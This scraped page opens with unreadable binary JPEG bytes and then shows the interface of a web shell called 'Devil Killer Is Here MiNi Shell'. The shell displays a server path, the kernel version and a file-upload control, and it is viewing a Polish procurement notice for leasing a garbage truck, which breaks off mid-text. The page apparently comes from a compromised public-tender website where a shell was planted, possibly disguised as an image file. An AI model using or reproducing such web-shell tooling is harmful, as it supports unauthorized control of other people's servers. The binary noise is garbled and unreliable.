JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220812/0030419701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa, w formie leasingu operacyjnego, fabrycznie nowej śmieciarki. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">EKOZUK Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 381607913</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Obrońców Helu 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wejherowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58/676-95-20</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ekozuk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zukwejherowo.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa, w formie leasingu operacyjnego, fabrycznie nowej śmieciarki. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fdded58a-1a23-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00304197</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zukwejherowo.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu, w<br/>szczególności składanie ofert, wszelkich oświadczeń, wniosków, zawiadomień, wymiana informacji<br/>oraz przekazywanie dokumentów między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków<br/>określonych w ustawie Pzp, odbywa się przy użyciu Platformy Zakupowej Zamawiającego pod<br/>adresem: https://zukwejherowo.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ogólne<br/>zasady korzystania z Platformy, z zastrzeżeniem ust. 2:<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Platformy na subdomenie<br/>https://zukwejherowo.ezamawiajacy.pl/servlet/HomeServlet lub https://oneplace.marketplanet.pl,<br/>2) Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;<br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”,<br/>3) rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca<br/>Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci<br/>elektronicznej; Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informację, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się<br/>pod numerem telefonu podanym w ww. potwierdzeniu,<br/>4) po założeniu konta Wykonawca ma możliwość złożenia oferty w postępowaniu.<br/>2. Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na<br/>Platformie tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512 kb/s,<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej<br/>w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>3. Zamawiający dopuszcza przesyłanie plików o wielkości do 100 MB.<br/>4. Zalecenia Zamawiającego dotyczące:<br/>1) kwalifikowanego podpisu elektronicznego:<br/>a) dla dokumentów w formacie .pdf zaleca się podpis formatem PAdES (PDF advanced electronic<br/>signature),<br/>b) dla dokumentów w formacie innym niż .pdf zaleca się podpis formatem XAdES (HML advanced<br/>electronic signature),<br/>2) podpisu zaufanego :<br/>a) wielkość pliku nie może przekraczać 10 MB,<br/>b) dla dokumentów w formacie .pdf zaleca się podpis formatem PAdES; Podpisany plik ma<br/>rozszerzenie .pdf,<br/>c) dla dokumentów w formacie innym niż .pdf zaleca się podpis formatem XAdES. Podpisany plik ma<br/>rozszerzenie .xml,<br/>3) podpisu osobistego :<br/>a) w przypadku wykorzystania aplikacji eDO Atp (obsługuje tylko dokumenty w formacie .pdf) na<br/>telefonach z obsługą technologii NFC wielkość dokumentów nie może przekroczyć 5MB,<br/>b) dla dokumentów w formacie .pdf zaleca się podpis wewnętrzny otoczony,<br/>c) dokumenty w formacie innym niż .pdf zaleca się podpisywać podpisem zewnętrznym lub<br/>otaczającym<br/>4) Po podpisaniu plików a przed ich załączeniem na Platformę zaleca się dokonanie weryfikacji<br/>kompletności i poprawności wszystkich złożonych podpisów (w szczególności gdy dokument został<br/>podpisany przez kilku reprezentantów lub przy wykorzystaniu różnych podpisów). W przypadku<br/>korzystania z wariantu składania podpisów zewnętrznych konieczne jest załączenie na Platformę<br/>dwóch plików, tj. pliku podpisywanego i pliku zawierającego podpis.<br/>5. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>1) plik/pliki oferty załączony/e przez Wykonawcę na Platformie i zapisany/e, widoczny/e jest/są na<br/>Platformie jako zaszyfrowany/e – format kodowania UTF8. Możliwość otworzenia pliku/ów dostępna<br/>jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert,<br/>2) oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (dalej: „rozporządzenie 2016/679”), EKOZUK Sp. z o. o. informuje, że:<br/>1. administratorem Pani/Pana danych osobowych jest EKOZUK Sp. z o. o., ul. Obrońców Helu 1, 84-<br/>200 Wejherowo,<br/>2. administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod<br/>adresem e-mail: iod@ekozuk.pl,<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządz. 2016/679 w<br/>celu związanym z przedm. postępow. o udzielenie zam. publ., prowadzonym w trybie podstawowym<br/>bez przeprowadzenia negocjacji,<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy Pzp,<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zam. publ.<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zam. publ.<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 rozporządz. 2016/679,<br/>8. posiada Pani/Pan:<br/>1) na podstawie art. 15 rozporządz. 2016/679 prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora<br/>niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia),<br/>2) na podstawie art. 16 rozporządz. 2016/679 prawo do sprostowania Pani/Pana danych<br/>osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zam. publ. ani zmianą postanowień umowy<br/>w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników),<br/>3) na podstawie art. 18 rozporządz. 2016/679 prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zam.<br/>publ. lub konkursu oraz przypadków,<br/>o których mowa w art. 18 ust. 2 rozporządz. 2016/679 (prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony<br/>prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego),<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy rozporządzenia<br/>2016/679,<br/>9. nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e rozporządz. 2016/679 prawo do usunięcia danych<br/>osobowych,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządz. 2016/679,<br/>3) na podstawie art. 21 rozporządzenia 2016/679 prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>rozporządzenia 2016/679,<br/>4) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>rozporządzeniem 2016/679 przetwarzanie Pani/Pana danych osobowych przez administratora.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DKZ/03/2022/E</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, w formie leasingu operacyjnego, fabrycznie nowej śmieciarki. Wymagane parametry techniczno-użytkowe:<br/>PODWOZIE<br/>1 Rok produkcji 2022<br/>2 Podwozie w konfiguracji 4x2<br/>3 Rozstaw osi 1 – 2, 4000 mm<br/>4 Silnik o mocy min. 270 KM<br/>5 DMC 18 t<br/>6 Nośność osi przedniej min. 8 t<br/>7 Nośność osi tylnych min. 13 t<br/>8 Zawieszenie przednie resorowe, tylne pneumatyczne<br/>9 Na osi tylnej przekładnia hipoidalna<br/>10 Zbiornik paliwa minimum 250 l.<br/>11 Układ oczyszczania spalin tylko SCR<br/>12 Sprzęgło jednotarczowe<br/>13 Układ hamulcowy z systemem EPB z ABS i ASR<br/>14 Hamulce osi przednie i tylnej - tarczowe<br/>15 Hamulec przystankowy do smieciarki z ograniczeniem cofania wg normy DIN EN 1501-01<br/>16 Hamulec postojowy z akustycznym sygnałem ostrzegania<br/>17 Rodzaj paliwa – olej napędowy<br/>18 Pojemność silnika min 7 dm3, max. 9 dm3<br/>19 12 biegowa skrzynia biegów zautomatyzowana, wyposażona w system automatycznej i manualnej, zmiany biegów, bez pedału sprzęgła<br/>20 Zamykany korek wlewu paliwa<br/>21 Blokada mechanizmu różnicowego<br/>22 Przystawka odbioru mocy – przystosowana do zabudowy<br/>23 Kabina trzy-osobowa dzienna, krótka, w kolorze białym<br/>24 Trzy niezależne fotele z pasami bezpieczeństwa<br/>25 Zawieszenie kabiny – stalowe, mechaniczne<br/>26 Siedzenie kierowcy z zawieszeniem pneumatycznym<br/>27 Kabina wyposażona w elektryczne szyby<br/>28 Kabina wyposażona w klimatyzację<br/>29 Szyba przednia przyciemniona<br/>30 Lustro przednie podgrzewane<br/>31 Radio fabryczne z głośnikami<br/>32 Układ kierowniczy lewostronny<br/>33 Regulowana kolumna kierownicy<br/>34 Oświetlenie zgodne z obowiązującymi przepisami ruchu drogowego<br/>35 Światła do jazdy dziennej<br/>36 Brzęczyk przy cofaniu<br/>37 Boczne światła obrysowe LED<br/>38 Tylne światło przeciwmgielne<br/>39 Błotniki z chlapaczami<br/>40 Zabezpieczenie przed wjechaniem pod pojazd ciężarowy<br/>41 Zderzak z zaczepem holowniczym<br/>42 Oświetlenie wejściowe w drzwiach<br/>43 Roleta przeciwsłoneczna szyby bocznej<br/>44 Tempomat<br/>45 Tachograf cyfrowy 2 generacji, ADR<br/>46 Komputer pokładowy<br/>47 Immobilizer<br/>48 Akumulatory min 2 szt. 220 Ah<br/>49 Mechaniczny wyłącznik akumulatorów<br/>50 Alternator min 100A<br/>51 Klin pod koła min. 1 szt.<br/>52 Trójkąt ostrzegawczy<br/>53 Osłona przeciwsłoneczna -daszek zamontowana na dachu kabiny<br/>54 CB radio<br/>ZABUDOWA<br/>1 Zabudowa skrzyniowa z urządzeniem załadowczym tylnym, przeznaczona do zbierania stałych odpadów komunalnych i surowców wtórnych<br/>2 Zabudowa fabrycznie nowa, rok produkcji 2022<br/>3 Skrzynia ładunkowa o kształcie owalnym<br/>4 Boki skrzyni ładunkowej wykonane z blach o grubości min. 4mm, wykonane z jednolitych arkuszy<br/>5 Podłoga skrzyni ładunkowej w kształcie owalnym lub kila<br/>6 Dno skrzyni ładunkowej wykonane z blachy konstrukcyjnej o grubości min 4.mm<br/>7 Zintegrowany zbiornik na odcieki o pojemności min 80 litrów w dnie skrzyni ładunkowej<br/>8 W przedniej części zabudowa połączona elastycznie z podwoziem, w tylnej na stałe<br/>9 Pojemność skrzyni ładunkowej min 16 m3<br/>10 Objętość kosza zasypowego odwłoka min 1,5 m3<br/>11 Dno wanny załadowczej wykonane z blachy trudnościeralnej o odpowiedniej twardości i grubości min 8 mm<br/>12 Boki wanny załadowczej wykonane z blachy trudnościeralnej o odpowiedniej twardości i grubości min 4 mm<br/>13 Mechanizm zgniatania liniowo – płytowy (szuflada)<br/>14 Siłowniki otwierania odwłoka umieszczone na bokach skrzyni ładunkowej<br/>15 Siłowniki prasy zagęszczającej umieszczone na zewnątrz odwłoka<br/>16 Możliwość wysunięcia płyty zgniatającej poza obrys skrzyni ładunkowej<br/>17 W pełni szczelne połączenie odwłoka ze skrzynią ładunkową<br/>18 Urządzenie do otwierania pokryw sterowane hydraulicznie<br/>19 Sterowanie płytą wypychającą (wysuwanie i wsuwanie) ze stanowiska na zewnątrz pojazdu i z kabiny kierowcy<br/>20 Układ uwalniania zakleszczonych przedmiotów<br/>21 Minimum dwa wyłączniki bezpieczeństwa (stop awaryjny) umieszczone po obu stronach zabudowy, jeden wyłącznik bezpieczeństwa w kabinie kierowcy<br/>22 Automatyczne sterowanie obrotami silnika w zależności od obciążenia układu hydraulicznego<br/>23 Minimalny stopień zagęszczania odpadów 1:5<br/>24 Terminal zintegrowany z monitorem kamery cofania, zamontowany w kabinie kierowcy do obsługi nadwozia umożliwiający między innymi wybór rodzaju zbieranych odpadów (szkło, bio, makulatura, odpady zmieszane, plastik), otwieranie i opróżnianie nadwozia, informację o zajętości stopni ładowaczy<br/>25 Uniwersalny wrzutnik do pojemników od 80 do 1100 litrów zgodny z EN 840 oraz pojemników 110 l<br/>26 Maksymalny czas opróżniania pojemników: 1) Dla pojemników 2 – kołowych max 8 sek. 2) Dla pojemników 4 – kołowych max 12 sek<br/>27 Wrzutnik przykręcany do odwłoka za pomocą śrub, w pełni demontowany<br/>28 Wrzutnik wyposażony w ramiona boczne do opróżniania pojemników 1 100 l<br/>29 Kurtyny antykurzowe zamontowane na wrzutniku<br/>30 Wrzutnik ze składaną ocynkowaną klapą umożliwiającą obniżenie krawędzi załadowczej<br/>31 Zabudowa gruntowana i lakierowana na kolor RAL biały<br/>32 Oświetlenie drogowe zgodnie z obecnie obowiązującymi przepisami ruchu drogowego<br/>33 Światło alarmowe „kogut” z przodu i tyłu zabudowy<br/>34 Dwa stopnie dla ładowaczy wraz z czujnikami, informującymi kierowcę o ich zajętości, oraz przypadku zajętości umożliwiające: 1) Ograniczenie prędkości jazdy do 30km/h do przodu. 2) Uniemożliwienie cofania pojazdem.3) Pracę układu ugniatania.<br/>35 Automatyczna autodiagnoza układu elektrycznego zabudowy przy każdorazowym uruchomieniu pojazdu<br/>36 System centralnego smarowania zabudowy<br/>37 Zabudowa wykonana zgodnie z obecnie obowiązującymi normami w tym EN1501-1<br/>38 Zabudowa wyposażona w ocynkowaną drabinkę pomocniczą przy drzwiach rewizyjnych<br/>39 Myjka do rąk ze zbiornikiem na wodę o pojemności min. 25l<br/>40 Uchwyt na szufelkę i miotłę<br/>41 Gaśnica wraz z zamocowaniem<br/>42 Oklejenie zabudowy folią (ok. 15 m2) zgodnie z grafiką, której wzór stanowi załącznik nr 7 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144510-6 - Pojazdy do transportu odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66110000-4 - Usługi bankowe</p> <p class="mb-0">66114000-2 - Usługi leasingu finansowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące zdolności technicznej lub zawodowej<br/>w zakresie doświadczenia Wykonawcy, tj.:<br/>Zamawiający 